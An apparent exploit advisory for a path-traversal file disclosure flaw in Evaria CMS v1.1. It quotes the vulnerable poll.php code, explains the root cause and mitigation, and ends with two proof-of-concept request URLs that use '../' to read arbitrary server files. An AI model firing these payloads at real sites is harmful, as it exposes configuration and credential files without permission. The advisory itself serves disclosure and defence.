# Exploit Title: local file include / File Disclosure # Date: # Author: khayeye shotor # Software Link: http://www.evaria.com/en/?view=download&dload=1 # Version: Evaria Content Management System v.1.1 # Thanks: khayeye sag , kandome mivei , sinehaye amam and all amehaye irani ----------- vul code: /path/admin/poll.php $file_contents = file("admin/".$current_poll); if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) { foreach ($file_contents as $line) { if (eregi($REMOTE_ADDR, $line)) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $already_voted . "
\n"; $set_already_voted = 1; $vote_allow = 0; break; } } } if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) { if ((isset($voted)) && ($voted == "on")) { if (!$set_already_voted) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $already_voted . "
\n"; } $vote_allow = 0; break; } } if ($vote_allow) { $poll_string = $vote . "|" . $REMOTE_ADDR . "\n"; $fp = fopen("admin/".$current_poll, "a"); $string_size = strlen($poll_string); if (fputs($fp, $poll_string, $string_size)) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $vote_cast . "
\n"; } fclose($fp); } } break; case "default": display_form(); break; } } // Display poll form if no view is called upon... if (!isset($mode)) { display_form(); } elseif ((isset($vote) == 0) && (isset($mode))) { display_form(); echo "\n \n"; echo " \n"; echo " \n
" . $no_selection . "
\n"; } function display_form() { global $config; global $no_voting; global $QUERY_STRING; echo "
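\n"; echo "\n"; echo " \n"; $answers = file("admin/".$config);
------------------------------------------------
Root cause: display_form() pulls $config in with `global $config` and concatenates it, unvalidated, into the path passed to file(). The excerpt does not show where $config is assigned; the proof of concept below implies that, with register_globals enabled, a `config` request parameter can populate it. The sink shown is file(), which reads a file rather than executing it, so what this excerpt demonstrates is file disclosure via path traversal (assuming the contents of $answers are echoed further down, which the excerpt cuts off), not code inclusion.
Mitigation: assign $config from server-side configuration before use and do not rely on register_globals; if the value must vary, check it against a fixed list of poll files or reduce it with basename() and confirm the resolved path (realpath()) stays inside admin/. $current_poll reaches file() and fopen(..., "a") through the same concatenation earlier in the excerpt and needs the same check.
poc:
/admin/poll.php?config=../../eprint.php
/admin/poll.php?config=[local file]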